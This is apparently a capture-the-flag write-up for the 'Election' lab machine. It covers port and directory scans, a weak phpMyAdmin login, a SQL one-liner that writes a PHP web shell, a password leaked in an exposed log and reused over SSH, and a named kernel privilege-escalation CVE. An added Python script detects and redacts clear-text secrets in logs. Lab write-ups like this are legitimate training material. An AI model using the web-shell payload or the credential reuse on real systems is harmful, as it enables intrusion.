Election

usershell

Target IP: 192.168.205.132

Port information

22/tcp open  ssh
80/tcp open  http

Web directory scan

/javascript           (Status: 301) [Size: 323] [--> http://192.168.205.132/javascript/]
/election             (Status: 301) [Size: 321] [--> http://192.168.205.132/election/]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.205.132/phpmyadmin/]

Approach 1

phpMyAdmin has a weak credential, root:toor

select '<?php system($_GET[cmd]);' into dumpfile "/var/www/html/cmd.php";

Writing the shell gives www-data privileges

Approach 2

Continuing the scan inside the election directory turns up a log directory

[02:18:15] 200 -  986B  - /election/admin/logs/                             

It exposes a log file, system.log; reading the log shows

[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

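This yields the credential love:P@$$w0rd@123. Logging in to the election admin panel with it fails, but logging in over ssh succeeds

This gives access as the user love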
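The credential leak in system.log, seen from the defender's side: an added example (not part of the original write-up) that scans log text for secrets written in clear text and redacts them. The sample lines are copied from the log excerpt above; the pattern list and the function name scan_log are assumptions.

```python
import re

# Sample input: the system.log lines quoted on this page.
SAMPLE_LOG = """\
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
"""

# "[timestamp] message", the layout used by the log lines on this page.
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<msg>.*)$")

# Assumed rule set: messages that write a secret in clear text.
SECRET_RES = [
    # "... Password for the user <name>: <secret>"
    re.compile(r"(?i)\bpassword\b.*?\buser\s+(?P<user>\S+?)\s*[:=]\s*(?P<secret>\S+)"),
    # generic "password=<secret>", "token: <secret>", ...
    re.compile(r"(?i)\b(?:password|passwd|pwd|secret|token)\s*[:=]\s*(?P<secret>\S+)"),
]

def scan_log(text):
    """Return (findings, redacted_text); findings never contain the secret."""
    findings, out = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        msg = m.group("msg") if m else line
        for rx in SECRET_RES:
            hit = rx.search(msg)
            if hit:
                findings.append({
                    "line": lineno,
                    "timestamp": m.group("ts") if m else None,
                    "user": hit.groupdict().get("user"),
                    "secret_length": len(hit.group("secret")),
                })
                # Redact in the output copy so the log can be kept or shared.
                line = line.replace(hit.group("secret"), "[REDACTED]")
                break
        out.append(line)
    return findings, "\n".join(out) + "\n"

if __name__ == "__main__":
    found, redacted = scan_log(SAMPLE_LOG)
    print(found)
    print(redacted, end="")
```

Any account whose password shows up in a finding should be rotated, since the log directory was readable over HTTP.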

rootshell

Kernel privilege escalation: CVE-2021-4034